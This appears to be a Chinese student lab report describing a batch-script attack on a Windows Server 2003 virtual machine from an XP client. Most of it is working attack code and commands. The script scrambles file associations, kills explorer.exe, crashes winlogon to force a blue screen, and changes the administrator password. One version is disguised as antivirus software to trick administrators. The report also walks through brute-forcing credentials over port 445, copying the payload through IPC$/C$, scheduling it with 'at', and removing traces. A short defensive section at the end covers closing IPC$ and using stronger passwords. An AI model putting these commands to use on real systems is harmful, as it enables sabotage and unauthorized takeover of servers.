针对win2003服务器的恶意代码攻击

针对win2003服务器的恶意代码攻击

摘要:
再本次实验中,利用批处理语言写出一个简单的脚本恶意代码,按照功能与使用场景不同,分成了交互时和非交互式两个版本,交互式版本可以伪装成杀毒软件,诱导Windows2003服务器管理者运行.非交互式可以通过客户机windowsXP进行远程攻击Windows2003服务器,过程如下:
1.配置网段与$IP$地址,使其相互$ping$通
2.利用445端口漏洞,XP通过ntscan工具对2003进行扫描端口以及管理员密码暴力破解.
3.根据得到的管理员帐号和密码通过XP命令行命令与目标主机2003建立IPC$
4.将恶意代码植入目标主机2003
5.通过net\ time等指令远程控制目标主机2003定时运行恶意代码.
6.运行结束,删除日志,退出登录
最后,总结了本次攻击过程中利用的漏洞,以及给出了防御方法与建议.

实验环境

所有实验过程在Vmware虚拟机进行,使用两个操作统,Windows2003作为服务器,为被攻击方.WindowsXP为客户机,为攻击方.操作系统信息如下:

• 2003

• xp

恶意代码语言构建与解释:

关键命令语句解释:

 `//注意:由于批处理语句在latex环境中识别错误,
 //所以为方便注释,将原本正确的注释格式::改成了C语言注释格式//
assoc .txt=exefile>nul //将系统中所有.txt后缀文件改成exefile,同时隐藏输出
assoc .exe=txtfile>nul//将系统中所有.exe后缀文件改成txtfile,同时隐藏输出
assoc .jpg=exefile>nul//将系统中所有.jpg后缀文件改成exefile,同时隐藏输出
ping -n 2 127.0.0.1>nul//利用ping命令,起到延时作用,同时隐藏输出
set /p num=输入密码是: //用户输入密码,同时赋值到num变量中
if "%num%"=="123" goto case1 //条件判断,进行跳转
if  not "%num%"=="123" goto case2
	
:case1 //跳转语句入口
assoc .txt=txtfile>nul //进行修复
assoc .exe=exefile>nul
assoc .jpg=jpgfile>nul
taskkill /im explorer.exe /f >nul 2>nul //强制杀死explorer进程,导致桌面系统瘫痪
ntsd -c q -pn winlogon.exe //蓝屏炸弹语句,
//会强制杀死winlogon进程,使系统重启,同时出现蓝屏`

交互式:

为了隐藏代码文件,将bat文件转换成exe程序,运行时结果如下:

1. 文件破坏:
   

2. 输入密码正确后,文件修复,自动退出
   

3. 密码输入错误后,锁住桌面系统,启动蓝屏炸弹:

非交互式:

bat关键代码及其解释如下:

assoc .txt=exefile>nul //将系统中所有.txt后缀文件改成exefile,同时隐藏输出
assoc .exe=txtfile>nul//将系统中所有.exe后缀文件改成txtfile,同时隐藏输出
assoc .jpg=exefile>nul//将系统中所有.jpg后缀文件改成exefile,同时隐藏输出
net user administrator 123//修改服务器开机密码.
taskkill /im explorer.exe /f >nul 2>nul //强制杀死explorer进程,导致桌面系统瘫痪
ntsd -c q -pn winlogon.exe //蓝屏炸弹语句,会强制杀死winlogon进程,使系统重启,同时出现蓝屏

实验过程:

#配置网段和IP,使其相互ping通

1. 使用Vmnet2网段

2. P配置

• Windows2003配置为10.1.1.3:

• XP配置为10.1.1.1

3. 相互ping
   

使用ntscan扫描以及暴力破解服务器账户与密码

1. 根据用户习惯设置密码字典

2. 根据用户习惯设置账户名字典

3. 利用IPC$端口开启暴力破解

将恶意代码植入2003服务器

1. 登录服务器 net use \\10.1.1.3\ipc$ abc /user:administrator
2. 植入代码到目标主机的C盘目录 copy d:Non_interactive.exe \\10.1.1.3\c$

• Windows2003:
• XP:

控制目标主机自动运行恶意代码

	net time//返回目标主机时间
	at \\10.1.1.3 XXX c:\Non_interactive.exe//XXX需要填入运行时间,一般比目标主机时间多5分钟
	at \\10.1.1.3//察看2003运行进程计划表

• XP:

• 2003:
  利用修改后的新密码123登陆后,文件已经被破坏:
  

退出登录,攻击结束

此步骤需要在运行恶意代码之前进行,否则会出现恶意代码运行后,密码改变,无法多用户访问服务器的情况.

	net use \\10.1.1.3\ipc$ /delte //退出登录

漏洞分析与防御

共有三个漏洞与相应建议:

IPC$

通过$netstat-an$以及$netshare$可以查看IPC$ 状态,本次攻击利用了445端口开放的漏洞,所以一般情况下,我们需要关闭此端口,以抵御端口扫描与暴力破解.检查与抵御过程如下:

• 查看IPC$服务,发现已开启,故有漏洞:

• 关闭此服务:

• 

• 再次查看,发现已经关闭:
  

密码设置

管理员密码设计过于简单,应该避开常用密码,尽量使用3/4准则设计密码.

管理员权限

对网络上的运行程序,运行前要慎重,有条件的话,可以运用一些工具查看以下脚本语言,再运行,尽量不要轻易使用管理员权限运行程序.

参考博客:

批处理语言基础
恶意代码参考
远程控制命令

ntscan资源 提取码：qphj
真空密码生成器提取码：c01y